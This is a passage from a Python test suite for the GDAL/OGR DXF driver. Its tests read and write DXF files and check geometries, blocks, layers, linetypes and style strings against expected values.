3139754.60313201 1783.30913579435,611230.928652852 3139755.5318128 1780.76827668182,611230.618432521 3139756.29761959 1778.16496303489,611230.375637135 3139756.89698184 1775.51133270351,611230.201398719 3139757.32710505 1772.81975813727,611230.096529651 3139757.58598378 1770.10278869926,611230.06151888 3139757.67241101 1767.37309215522,611230.06151892 3139757.67241089 1661.18408370228,611230.06151892 3139757.67241089 1661.18408370228,611230.026508154 3139757.75883812 1658.45438717061,611229.921639091 3139758.01771683 1655.73741774404,611229.74740068 3139758.44784002 1653.04584318824,611229.5046053 3139759.04720226 1650.39221286628,611229.194384975 3139759.81300904 1647.78889922769,611228.818186096 3139760.74168982 1645.24804012238,611228.377762675 3139761.82891465 1642.78148220841,611227.87516817 3139763.0696144 1640.40072571739,611227.312745909 3139764.45800435 1638.11687083509,611226.693118163 3139765.98761118 1635.94056594722,611226.019173923 3139767.65130317 1633.88195799181,611225.294055428 3139769.4413234 1631.95064514943,611224.521143516 3139771.34932599 1630.15563209209,611223.704041858 3139773.36641494 1628.50528799927,611222.84656016 3139775.48318565 1627.00730753696,611221.952696397 3139777.68976876 1625.66867498157,611221.026618175 3139779.97587617 1624.49563165602,611220.072643298 3139782.33084897 1623.49364682979,611219.095219637 3139784.74370721 1622.66739221866,611218.098904392 3139787.20320102 1622.02072020306,611217.088342845 3139789.69786311 1621.55664586644,' +
'611216.0682467 3139792.21606221 1621.27733293758,611215.043372117 3139794.74605732 1621.18408370228,610905.973331759 3140557.71325641 1621.18408370228,610905.973331759 3140557.71325641 1621.18408370228,610904.948457176 3140560.24325151 1621.2773329396,610903.928361033 3140562.76145061 1621.55664587034,610902.917799487 3140565.2561127 1622.02072020868,610901.921484243 3140567.71560651 1622.66739222582,610900.944060583 3140570.12846474 1623.49364683831,610899.990085707 3140572.48343755 1624.49563166573,610899.064007486 3140574.76954495 1625.66867499227,610898.170143725 3140576.97612806 1627.00730754846,610897.312662028 3140579.09289877 1628.50528801138,610896.495560372 3140581.10998771 1630.1556321046,610895.722648461 3140583.0179903 1631.95064516215,610894.997529967 3140584.80801053 1633.88195800453,610894.323585729 3140586.47170251 1635.94056595974,610893.703957984 3140588.00130935 1638.1168708472,610893.141535724 3140589.38969929 1640.4007257289,610892.63894122 3140590.63039904 1642.78148221912,610892.198517801 3140591.71762387 1645.2480401321,610891.822318923 3140592.64630464 1647.78889923622,610891.5120986 3140593.41211142 1650.39221287345,610891.269303221 3140594.01147366 1653.04584319386,610891.095064811 3140594.44159685 1655.73741774794,610890.99019575 3140594.70047556 1658.45438717264,610890.955184986 3140594.78690278 1661.18408370228,610890.955185021 3140594.78690272 1752.31638281001,610890.955185021 3140594.78690271 1752.31638281001,610890.920174252 3140594.87332995 1755.04607934987,610890.815305187 3140595.13220867 1757.76304878401,610890.641066773 3140595.56233187 1760.45462334672,610890.398271389 3140596.16169412 1763.10825367492,610890.088051061 3140596.92750091 1765.71156731903,610889.711852178 3140597.85618169 1768.25242642912,610889.271428753 3140598.94340654 1770.71898434711,610888.768834244 3140600.1841063 1773.09974084137,610888.206411978 3140601.57249626 1775.38359572612,610887.586784228 3140603.1021031 1777.55990061562,610886.912839984 3140604.7657951 1779.61850857185,610886.187721485 3140606.55581535 1781.54982141423,610885.414809569 3140608.46381795 1783.34483447076,610884.597707907 3140610.48090691 1784.99517856195,610883.740226205 3140612.59767763 1786.49315902182,610882.846362438 3140614.80426075 1787.83179157397,610881.920284211 3140617.09036817 1789.0048348955,610880.96630933 3140619.44534098 1790.00681971696,610879.988885665 3140621.85819923 1790.83307432256,610878.992570417 3140624.31769305 1791.47974633192,610877.982008866 3140626.81235515 1791.94382066162,610876.961912718 3140629.33055426 1792.22313358291,610875.937038132 3140631.86054938 1792.31638281001,610699.99993399 3141066.17711854 1792.31638281001)' ):
return 'fail'
ocs_lyr = None
ocs_ds = None
return 'success'
###############################################################################
# Test reading from an entities-only dxf file (#3412)
def ogr_dxf_11():
eo_ds = ogr.Open('data/entities_only.dxf')
eo_lyr = eo_ds.GetLayer(0)
# Check first point.
feat = eo_lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'POINT (672500.0 242000.0 539.986)' ):
return 'fail'
# Check second point.
feat = eo_lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'POINT (672750.0 242000.0 558.974)' ):
return 'fail'
eo_lyr = None
eo_ds = None
return 'success'
###############################################################################
# Write a simple file with a polygon and a line, and read back.
def ogr_dxf_12():
ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_11.dxf' )
lyr = ds.CreateLayer( 'entities' )
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'LINESTRING(10 12, 60 65)' ) )
lyr.CreateFeature( dst_feat )
dst_feat = None
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POLYGON((0 0,100 0,100 100,0 0))' ) )
lyr.CreateFeature( dst_feat )
dst_feat = None
# Test 25D linestring with constant Z (#5210)
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'LINESTRING(1 2 10,3 4 10)' ) )
lyr.CreateFeature( dst_feat )
dst_feat = None
# Test 25D linestring with different Z (#5210)
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'LINESTRING(1 2 -10,3 4 10)' ) )
lyr.CreateFeature( dst_feat )
dst_feat = None
lyr = None
ds = None
# Read back.
ds = ogr.Open('tmp/dxf_11.dxf')
lyr = ds.GetLayer(0)
# Check first feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'LINESTRING(10 12, 60 65)' ):
print(feat.GetGeometryRef().ExportToWkt())
return 'fail'
if feat.GetGeometryRef().GetGeometryType() != ogr.wkbLineString:
gdaltest.post_reason( 'not linestring 2D' )
return 'fail'
feat = None
# Check second feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'POLYGON((0 0,100 0,100 100,0 0))' ):
print(feat.GetGeometryRef().ExportToWkt())
return 'fail'
if feat.GetGeometryRef().GetGeometryType() != ogr.wkbPolygon:
gdaltest.post_reason( 'not keeping polygon 2D' )
return 'fail'
feat = None
# Check third feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'LINESTRING(1 2 10,3 4 10)' ):
print(feat.GetGeometryRef().ExportToWkt())
return 'fail'
feat = None
# Check fourth feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'LINESTRING(1 2 -10,3 4 10)' ):
print(feat.GetGeometryRef().ExportToWkt())
return 'fail'
feat = None
lyr = None
ds = None
ds = None
os.unlink( 'tmp/dxf_11.dxf' )
return 'success'
###############################################################################
# Check smoothed polyline.
def ogr_dxf_13():
ds = ogr.Open( 'data/polyline_smooth.dxf' )
layer = ds.GetLayer(0)
feat = layer.GetNextFeature()
if feat.Layer != '1':
gdaltest.post_reason( 'did not get expected layer for feature 0' )
return 'fail'
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbLineString25D:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
envelope = geom.GetEnvelope()
area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
exp_area = 1350.43
if area < exp_area - 0.5 or area > exp_area + 0.5:
gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
return 'fail'
# Check for specific number of points from tessellated arc(s).
# Note that this number depends on the tessellation algorithm and
# possibly the default global arc_stepsize variable; therefore it is
# not guaranteed to remain constant even if the input DXF file is constant.
# If you retain this test, you may need to update the point count if
# changes are made to the aforementioned items. Ideally, one would test
# only that more points are returned than in the original polyline, and
# that the points lie along (or reasonably close to) said path.
if geom.GetPointCount() != 146:
gdaltest.post_reason( 'did not get expected number of points, got %d' % (geom.GetPointCount()) )
return 'fail'
if abs(geom.GetX(0)-251297.8179) > 0.001 \
or abs(geom.GetY(0)-412226.8286) > 0.001:
gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
% (geom.GetX(0),geom.GetY(0)) )
return 'fail'
# Other possible tests:
# Polylines with no explicit Z coordinates (e.g., no attribute 38 for
# LWPOLYLINE and no attribute 30 for POLYLINE) should always return
# geometry type ogr.wkbPolygon. Otherwise, ogr.wkbPolygon25D should be
# returned even if the Z coordinate values are zero.
# If the arc_stepsize global is used, one could test that returned adjacent
# points do not slope-diverge greater than that value.
ds = None
return 'success'
###############################################################################
# Check smooth LWPOLYLINE entity.
def ogr_dxf_14():
# This test is identical to the previous one except the
# newer lwpolyline entity is used. See the comments in the
# previous test regarding caveats, etc.
ds = ogr.Open( 'data/lwpolyline_smooth.dxf' )
layer = ds.GetLayer(0)
feat = layer.GetNextFeature()
if feat.Layer != '1':
gdaltest.post_reason( 'did not get expected layer for feature 0' )
return 'fail'
geom = feat.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbLineString:
gdaltest.post_reason( 'did not get expected geometry type.' )
return 'fail'
envelope = geom.GetEnvelope()
area = (envelope[1] - envelope[0]) * (envelope[3] - envelope[2])
exp_area = 1350.43
if area < exp_area - 0.5 or area > exp_area + 0.5:
gdaltest.post_reason( 'envelope area not as expected, got %g.' % area )
return 'fail'
if geom.GetPointCount() != 146:
gdaltest.post_reason( 'did not get expected number of points, got %d' % (geom.GetPointCount()) )
return 'fail'
if abs(geom.GetX(0)-251297.8179) > 0.001 \
or abs(geom.GetY(0)-412226.8286) > 0.001:
gdaltest.post_reason( 'first point (%g,%g) not expected location.' \
% (geom.GetX(0),geom.GetY(0)) )
return 'fail'
ds = None
return 'success'
###############################################################################
# Write a file with dynamic layer creation and confirm that the
# dynamically created layer 'abc' matches the definition of the default
# layer '0'.
def ogr_dxf_15():
ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_14.dxf',
['FIRST_ENTITY=80'] )
lyr = ds.CreateLayer( 'entities' )
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'LINESTRING(10 12, 60 65)' ) )
dst_feat.SetField( 'Layer', 'abc' )
lyr.CreateFeature( dst_feat )
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POLYGON((0 0,100 0,100 100,0 0))' ) )
lyr.CreateFeature( dst_feat )
lyr = None
ds = None
# Read back.
ds = ogr.Open('tmp/dxf_14.dxf')
lyr = ds.GetLayer(0)
# Check first feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'LINESTRING(10 12, 60 65)' ):
print(feat.GetGeometryRef().ExportToWkt())
return 'fail'
if feat.GetGeometryRef().GetGeometryType() == ogr.wkbLineString25D:
gdaltest.post_reason( 'not linestring 2D' )
return 'fail'
if feat.GetField('Layer') != 'abc':
gdaltest.post_reason( 'Did not get expected layer, abc.' )
return 'fail'
# Check second point.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat,
'POLYGON((0 0,100 0,100 100,0 0))' ):
print(feat.GetGeometryRef().ExportToWkt())
return 'fail'
if feat.GetGeometryRef().GetGeometryType() == ogr.wkbPolygon25D:
gdaltest.post_reason( 'not keeping polygon 2D' )
return 'fail'
if feat.GetField('Layer') != '0':
print(feat.GetField('Layer'))
gdaltest.post_reason( 'Did not get expected layer, 0.' )
return 'fail'
lyr = None
ds = None
# Check the DXF file itself to try and ensure that the layer
# is defined essentially as we expect. We assume the only thing
# that will be different is the layer name is 'abc' instead of '0'
# and the entity id.
outdxf = open('tmp/dxf_14.dxf').read()
start_1 = outdxf.find(' 0\nLAYER')
start_2 = outdxf.find(' 0\nLAYER',start_1+10)
txt_1 = outdxf[start_1:start_2]
txt_2 = outdxf[start_2:start_2+len(txt_1)+2]
abc_off = txt_2.find('abc\n')
if txt_2[16:abc_off] + '0' + txt_2[abc_off+3:] != txt_1[16:]:
print(txt_2[abc_off] + '0' + txt_2[abc_off+3:])
print(txt_1)
gdaltest.post_reason( 'Layer abc does not seem to match layer 0.' )
return 'fail'
# Check that $HANDSEED was set as expected.
start_seed = outdxf.find('$HANDSEED')
handseed = outdxf[start_seed+10+4:start_seed+10+4+8]
if handseed != '00000053':
gdaltest.post_reason( 'Did not get expected HANDSEED, got %s.' % handseed)
return 'fail'
os.unlink( 'tmp/dxf_14.dxf' )
return 'success'
###############################################################################
# Test reading without DXF blocks inlined.
def ogr_dxf_16():
gdal.SetConfigOption( 'DXF_INLINE_BLOCKS', 'FALSE' )
dxf_ds = ogr.Open( 'data/assorted.dxf' )
if dxf_ds is None:
return 'fail'
if dxf_ds.GetLayerCount() != 2:
gdaltest.post_reason( 'expected exactly two layers!' )
return 'fail'
dxf_layer = dxf_ds.GetLayer(1)
if dxf_layer.GetName() != 'entities':
gdaltest.post_reason( 'did not get expected layer name.' )
return 'fail'
# read through till we encounter the block reference.
feat = dxf_layer.GetNextFeature()
while feat.GetField('EntityHandle') != '55':
feat = dxf_layer.GetNextFeature()
# check contents.
if feat.GetField('BlockName') != 'STAR':
gdaltest.post_reason( 'Did not get blockname!' )
return 'fail'
if feat.GetField('BlockAngle') != 0.0:
gdaltest.post_reason( 'Did not get expected angle.' )
return 'fail'
if feat.GetField('BlockScale') != [1.0,1.0,1.0]:
print(feat.GetField('BlockScale'))
gdaltest.post_reason( 'Did not get expected BlockScale' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT (79.097653776656188 119.962195062443342 0)' ):
return 'fail'
feat = None
# Now we need to check the blocks layer and ensure it is as expected.
dxf_layer = dxf_ds.GetLayer(0)
if dxf_layer.GetName() != 'blocks':
gdaltest.post_reason( 'did not get expected layer name.' )
return 'fail'
# STAR geometry
feat = dxf_layer.GetNextFeature()
if feat.GetField('Block') != 'STAR':
gdaltest.post_reason( 'Did not get expected block name.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((-0.028147497671066 1.041457413829428 0,0.619244948763444 -1.069604911500494 0),(0.619244948763444 -1.069604911500494 0,-0.957014920816232 0.478507460408116 0),(-0.957014920816232 0.478507460408116 0,1.041457413829428 0.365917469723853 0),(1.041457413829428 0.365917469723853 0,-0.478507460408116 -1.041457413829428 0),(-0.478507460408116 -1.041457413829428 0,-0.056294995342131 1.013309916158363 0))' ):
return 'fail'
# First MTEXT
feat = dxf_layer.GetNextFeature()
if feat.GetField( 'Text' ) != gdaltest.sample_text:
gdaltest.post_reason( 'Did not get expected first mtext.' )
return 'fail'
expected_style = 'LABEL(f:"Arial",t:"'+gdaltest.sample_style+'",a:45,s:0.5g,p:5,c:#000000)'
if feat.GetStyleString() != expected_style:
gdaltest.post_reason( 'Got unexpected style string:\n%s\ninstead of:\n%s.' % (feat.GetStyleString(),expected_style) )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT (-1.495452348993292 0.813702013422821 0)' ):
return 'fail'
# Second MTEXT
feat = dxf_layer.GetNextFeature()
if feat.GetField( 'Text' ) != 'Second':
gdaltest.post_reason( 'Did not get expected second mtext.' )
return 'fail'
if feat.GetField( 'SubClasses' ) != 'AcDbEntity:AcDbMText':
gdaltest.post_reason( 'Did not get expected subclasses.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT (0.879677852348995 -0.263903355704699 0)' ):
return 'fail'
feat = None
# cleanup
gdal.SetConfigOption( 'DXF_INLINE_BLOCKS', 'TRUE' )
return 'success'
###############################################################################
# Write a file with blocks defined from a source blocks layer.
def ogr_dxf_17():
ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_17.dxf',
['HEADER=data/header_extended.dxf'])
blyr = ds.CreateLayer( 'blocks' )
lyr = ds.CreateLayer( 'entities' )
dst_feat = ogr.Feature( feature_def = blyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt(
'GEOMETRYCOLLECTION( LINESTRING(0 0,1 1),LINESTRING(1 0,0 1))' ) )
dst_feat.SetField( 'Block', 'XMark' )
blyr.CreateFeature( dst_feat )
# Block with 2 polygons
dst_feat = ogr.Feature( feature_def = blyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt(
'GEOMETRYCOLLECTION( POLYGON((10 10,10 20,20 20,20 10,10 10)),POLYGON((10 -10,10 -20,20 -20,20 -10,10 -10)))' ) )
dst_feat.SetField( 'Block', 'Block2' )
blyr.CreateFeature( dst_feat )
# Block with point and line
dst_feat = ogr.Feature( feature_def = blyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt(
'GEOMETRYCOLLECTION( POINT(1 2),LINESTRING(0 0,1 1))' ) )
dst_feat.SetField( 'Block', 'Block3' )
blyr.CreateFeature( dst_feat )
# Write a block reference feature.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(200 100)' ))
dst_feat.SetField( 'Layer', 'abc' )
dst_feat.SetField( 'BlockName', 'XMark' )
lyr.CreateFeature( dst_feat )
# Write a block reference feature for a non-existent block.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(300 50)' ))
dst_feat.SetField( 'Layer', 'abc' )
dst_feat.SetField( 'BlockName', 'DoesNotExist' )
lyr.CreateFeature( dst_feat )
# Write a block reference feature for a template defined block
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(250 200)' ))
dst_feat.SetField( 'Layer', 'abc' )
dst_feat.SetField( 'BlockName', 'STAR' )
lyr.CreateFeature( dst_feat )
# Write a block reference feature with scaling and rotation
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(300 100)' ))
dst_feat.SetField( 'BlockName', 'XMark' )
dst_feat.SetField( 'BlockAngle', '30' )
dst_feat.SetFieldDoubleList(lyr.GetLayerDefn().GetFieldIndex('BlockScale'),
[4.0,5.0,6.0] )
lyr.CreateFeature( dst_feat )
# Write a Block2 reference feature.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(350 100)' ))
dst_feat.SetField( 'Layer', 'abc' )
dst_feat.SetField( 'BlockName', 'Block2' )
lyr.CreateFeature( dst_feat )
# Write a Block3 reference feature.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(400 100)' ))
dst_feat.SetField( 'Layer', 'abc' )
dst_feat.SetField( 'BlockName', 'Block3' )
lyr.CreateFeature( dst_feat )
ds = None
# Reopen and check contents.
ds = ogr.Open('tmp/dxf_17.dxf')
lyr = ds.GetLayer(0)
# Check first feature.
feat = lyr.GetNextFeature()
if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
gdaltest.post_reason( 'Got wrong subclasses for feature 1.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((200 100,201 101),(201 100,200 101))' ):
print( 'Feature 1' )
return 'fail'
# Check 2nd feature.
feat = lyr.GetNextFeature()
if feat.GetField('SubClasses') != 'AcDbEntity:AcDbPoint':
gdaltest.post_reason( 'Got wrong subclasses for feature 2.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'POINT (300 50)' ):
print( 'Feature 2' )
return 'fail'
# Check 3rd feature.
feat = lyr.GetNextFeature()
if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
gdaltest.post_reason( 'Got wrong subclasses for feature 3.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((249.971852502328943 201.04145741382942 0,250.619244948763452 198.930395088499495 0),(250.619244948763452 198.930395088499495 0,249.042985079183779 200.47850746040811 0),(249.042985079183779 200.47850746040811 0,251.04145741382942 200.365917469723854 0),(251.04145741382942 200.365917469723854 0,249.52149253959189 198.95854258617058 0),(249.52149253959189 198.95854258617058 0,249.943705004657858 201.013309916158363 0))' ):
print( 'Feature 3' )
return 'fail'
# Check 4th feature (scaled and rotated)
feat = lyr.GetNextFeature()
if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
gdaltest.post_reason( 'Got wrong subclasses for feature 4.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((300 100,300.964101615137736 106.330127018922198), (303.464101615137736 102.0,297.5 104.330127018922198))' ):
print( 'Feature 4' )
return 'fail'
# Check 5th feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'MULTIPOLYGON (((360 110,360 120,370 120,370 110,360 110)),((360 90,360 80,370 80,370 90,360 90)))' ):
print( 'Feature 5' )
return 'fail'
# Check 6th feature
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'GEOMETRYCOLLECTION (POINT (401 102),LINESTRING (400 100,401 101))' ):
print( 'Feature 5' )
return 'fail'
# Cleanup
lyr = None
ds = None
os.unlink( 'tmp/dxf_17.dxf' )
return 'success'
###############################################################################
# Write a file with line patterns, and make sure corresponding Linetypes are
# created.
def ogr_dxf_18():
ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_18.dxf',
['HEADER=data/header_extended.dxf'])
lyr = ds.CreateLayer( 'entities' )
# Write a feature with a predefined LTYPE in the header.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt('LINESTRING(0 0,25 25)') )
dst_feat.SetField( 'Linetype', 'DASHED' )
dst_feat.SetStyleString( 'PEN(c:#ffff00,w:2g,p:"12.0g 6.0g")' )
lyr.CreateFeature( dst_feat )
# Write a feature with a named linetype but that isn't predefined in the header.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt('LINESTRING(5 5,30 30)') )
dst_feat.SetField( 'Linetype', 'DOTTED' )
dst_feat.SetStyleString( 'PEN(c:#ffff00,w:2g,p:"0.0g 4.0g")' )
lyr.CreateFeature( dst_feat )
# Write a feature without a linetype name - it will be created.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt('LINESTRING(5 5,40 30)') )
dst_feat.SetStyleString( 'PEN(c:#ffff00,w:2g,p:"3.0g 4.0g")' )
lyr.CreateFeature( dst_feat )
# Write a feature with a linetype proportional to a predefined one.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt('LINESTRING(5 5,40 20)') )
dst_feat.SetStyleString( 'PEN(c:#ffff00,w:0.3mm,p:"6.35g 3.0617284g")' )
lyr.CreateFeature( dst_feat )
# Write a feature with a linetype proportional to an auto-created one.
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt('LINESTRING(5 5,40 10)') )
dst_feat.SetStyleString( 'PEN(c:#ffff00,w:20px,p:"6.0g 8.0g")' )
lyr.CreateFeature( dst_feat )
ds = None
# Reopen and check contents.
ds = ogr.Open('tmp/dxf_18.dxf')
lyr = ds.GetLayer(0)
# Check first feature.
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'DASHED':
gdaltest.post_reason( 'Got wrong linetype. (1)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#ffff00,w:2g,p:"12.7g 6.1234567892g")':
print(feat.GetStyleString())
gdaltest.post_reason( "got wrong style string (1)" )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'LINESTRING (0 0,25 25)' ):
return 'fail'
# Check second feature.
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'DOTTED':
gdaltest.post_reason( 'Got wrong linetype. (2)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#ffff00,w:2g,p:"0g 4g")':
print(feat.GetStyleString())
gdaltest.post_reason( "got wrong style string (2)" )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'LINESTRING (5 5,30 30)' ):
return 'fail'
# Check third feature.
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'AutoLineType-1':
gdaltest.post_reason( 'Got wrong linetype. (3)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#ffff00,w:2g,p:"3g 4g")':
print(feat.GetStyleString())
gdaltest.post_reason( "got wrong style string (3)" )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'LINESTRING (5 5,40 30)' ):
return 'fail'
# Check fourth feature.
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'DASHED':
gdaltest.post_reason( 'Got wrong linetype. (4)' )
return 'fail'
# TODO why did the lineweight go AWOL here?
if feat.GetStyleString() != 'PEN(c:#ffff00,p:"6.35g 3.0617283946g")':
print(feat.GetStyleString())
gdaltest.post_reason( "got wrong style string (4)" )
return 'fail'
# Check fifth feature.
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'AutoLineType-1':
gdaltest.post_reason( 'Got wrong linetype. (5)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#ffff00,w:0.01g,p:"6g 8g")':
print(feat.GetStyleString())
gdaltest.post_reason( "got wrong style string (5)" )
return 'fail'
# Cleanup
lyr = None
ds = None
os.unlink( 'tmp/dxf_18.dxf' )
return 'success'
###############################################################################
# Test writing a file using references to blocks defined entirely in the
# template - no blocks layer transferred.
def ogr_dxf_19():
ds = ogr.GetDriverByName('DXF').CreateDataSource('tmp/dxf_19.dxf',
['HEADER=data/header_extended.dxf'])
lyr = ds.CreateLayer( 'entities' )
# Write a block reference feature for a template defined block
dst_feat = ogr.Feature( feature_def = lyr.GetLayerDefn() )
dst_feat.SetGeometryDirectly( ogr.CreateGeometryFromWkt( 'POINT(250 200)' ))
dst_feat.SetField( 'Layer', 'abc' )
dst_feat.SetField( 'BlockName', 'STAR' )
lyr.CreateFeature( dst_feat )
ds = None
# Reopen and check contents.
ds = ogr.Open('tmp/dxf_19.dxf')
lyr = ds.GetLayer(0)
# Check first feature.
feat = lyr.GetNextFeature()
if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
gdaltest.post_reason( 'Got wrong subclasses for feature 1.' )
return 'fail'
if ogrtest.check_feature_geometry( feat, 'MULTILINESTRING ((249.971852502328943 201.04145741382942 0,250.619244948763452 198.930395088499495 0),(250.619244948763452 198.930395088499495 0,249.042985079183779 200.47850746040811 0),(249.042985079183779 200.47850746040811 0,251.04145741382942 200.365917469723854 0),(251.04145741382942 200.365917469723854 0,249.52149253959189 198.95854258617058 0),(249.52149253959189 198.95854258617058 0,249.943705004657858 201.013309916158363 0))' ):
return 'fail'
# Cleanup
lyr = None
ds = None
os.unlink( 'tmp/dxf_19.dxf' )
return 'success'
###############################################################################
# SPLINE
def ogr_dxf_20():
ds = ogr.Open('data/spline_qcad.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (10.75 62.75,20.637752769146068 63.434832501489716,29.283239084385464 63.396838394381845,36.766943814562865 62.711565975596599,43.169351828522906 61.454563542054103,48.570947995110252 59.70137939067456,53.05221718316956 57.527561818378146,56.693644261545501 55.008659122085049,59.575714099082703 52.220219598715438,61.778911564625851 49.237791545189509,63.383721527019588 46.136923258427423,64.470628855108572 42.993163035349369,65.120118417737459 39.882059172875508,65.412419131869868 36.878358785215056,65.417809785093752 34.025663008687722,65.193643595004147 31.327113252708507,64.796409941597645 28.783146935042897,64.282598204870823 26.394201473456341,63.708697764820236 24.16071428571431,63.131198001442392 22.083122789582241,62.606588294733939 20.161864402825621,62.191358024691354 18.397376543209894,61.941996571311265 16.790096628500525,61.914993314590184 15.340462076462975,62.166837634524704 14.0489103048627,62.754018911111373 12.915878731465167,63.723652286703427 11.940700981548817,65.053571428571416 11.114552964042769,66.690557841792398 10.424954275262921,68.581246558980226 9.859407264767562,70.672272612748785 9.405414282114966,72.910271035711943 9.050477676863418,75.241876860483572 8.782099798571203,77.613725119677511 8.587782996796603,79.97245084590763 8.4550296210979,82.264689071787842 8.371342021033378,84.437074829931987 8.324222546161321,86.436243152953921 8.301173546040012,88.208926721776336 8.289771106365336,89.722559658784164 8.293223374005688,90.990763736417563 8.349615688917151,92.033410218878885 8.501752503862612,92.870370370370395 8.792438271604945,93.521515455094473 9.264477444907039,94.006716737253413 9.960674476531764,94.345845481049565 10.923833819242011,94.558772950685281 12.196759925800654,94.665370410362868 13.82225724897058,94.685509124284636 15.843130241514663,94.639060356652948 18.302183356195791,94.545895371670113 21.242221045776841,94.421471763308503 24.702030018356666,94.215205541358216 28.660279617432039,93.825673773330607 33.049360720184715,93.15014577259474 37.800473760933045,92.085890852519697 42.844819173995376,90.530178326474584 48.113597393690064,88.380277507828495 53.538008854335445,85.533457709950525 59.049253990249873,81.886988246209697 64.578533235751706,77.338138429975174 70.057047025159264,71.784177574615995 75.415995792790937,65.122374993501282 80.586579972965055,57.25 85.5)' ):
return 'fail'
ds = None
return 'success'
###############################################################################
# CIRCLE
def ogr_dxf_21():
ds = ogr.Open('data/circle.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
